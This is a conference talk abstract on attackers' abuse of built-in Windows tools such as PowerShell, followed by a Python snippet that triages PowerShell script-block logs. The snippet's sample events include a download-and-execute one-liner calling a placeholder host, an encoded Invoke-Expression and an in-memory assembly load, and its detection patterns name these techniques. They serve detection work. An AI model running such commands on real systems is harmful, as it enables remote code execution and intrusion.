lecture: Legitimate tools or weapons of mass compromise?


Windows desktops and servers ship with a large number of legitimate tools that attackers can also use once they have obtained initial access. This presentation describes those tools and how they are used in real-world attacks.

Centralised logging and telemetry provide a wealth of information for blue team members in their day-to-day operations. These sources usually contain enough data to detect when attackers have succeeded in compromising the defended network.

But how do you recognise a successful attack when the tools the attackers use are also legitimate system administration utilities? Most Windows administrators would agree that PowerShell is an essential system administration tool, but it is also frequently seen as an attack avenue in both criminal attacks and red team activities.

For example, we often observe PowerShell activity in ransomware attacks, malicious crypto mining and even more serious targeted attacks. PowerShell is typically used to load code from remote servers and make the attack “fileless” through reflective DLL loading, to steal user credentials, to pivot within the compromised network and to execute other offensive tasks.
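As an added illustration of the detection angle (not code from the talk or its author), the snippet below triages constructed records shaped like PowerShell Script Block Logging entries and flags blocks that combine a remote download with dynamic evaluation, carry an encoded payload, or load an assembly in memory; the indicator names, weights and sample text are assumptions for this example.

```python
import re

# Constructed sample records shaped like Script Block Logging entries
# (record id, script block text). Not real telemetry.
SAMPLE_EVENTS = [
    (1, "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"),
    (2, "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    (3, "Invoke-Expression ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)))"),
    (4, "$a=[System.Reflection.Assembly]::Load($bytes); $a.EntryPoint.Invoke($null,$null)"),
    (5, "Invoke-WebRequest -Uri https://example.invalid/update.msi -OutFile C:\\temp\\update.msi"),
]

# Coarse triage heuristics (name -> (weight, case-insensitive regex)).
# Assumed for this example, not a complete signature set.
INDICATORS = {
    "remote_download": (1, re.compile(r"Net\.WebClient|Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile", re.I)),
    "dynamic_eval": (1, re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
    "encoded_payload": (1, re.compile(r"FromBase64String", re.I)),
    # In-memory assembly loading is rare in admin scripts, so it scores higher on its own.
    "in_memory_load": (2, re.compile(r"Reflection\.Assembly\]::Load\b|VirtualAlloc|\bWriteProcessMemory\b", re.I)),
}

def score_script_block(text):
    """Return the set of indicator names that match one script block."""
    return {name for name, (_, rx) in INDICATORS.items() if rx.search(text)}

def triage(events, threshold=2):
    """Return (record_id, sorted indicator names) for blocks whose summed
    indicator weight reaches the threshold. A lone download (event 5) or a
    lone Invoke-Expression stays below it, which keeps ordinary admin
    scripts out of the queue while download-and-execute chains are kept."""
    findings = []
    for record_id, text in events:
        hits = score_script_block(text)
        if sum(INDICATORS[h][0] for h in hits) >= threshold:
            findings.append((record_id, sorted(hits)))
    return findings

if __name__ == "__main__":
    for record_id, hits in triage(SAMPLE_EVENTS):
        print(f"record {record_id}: {', '.join(hits)}")
```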

Right from the initial compromise we can expect attackers to use standard Windows tools for enumerating the network, adding new users, pivoting to other servers, dumping databases, exfiltrating data and so on.

This session will be a walkthrough of attackers' techniques using tools that can also be considered legitimate and are usually installed by default on Windows. We will talk about the basic and advanced functionality of these legitimate weapons and show their usage in recent real-world attacks.


Day: 2019-09-13
Start time: 17:00
Duration: 01:00
Room: Tesla
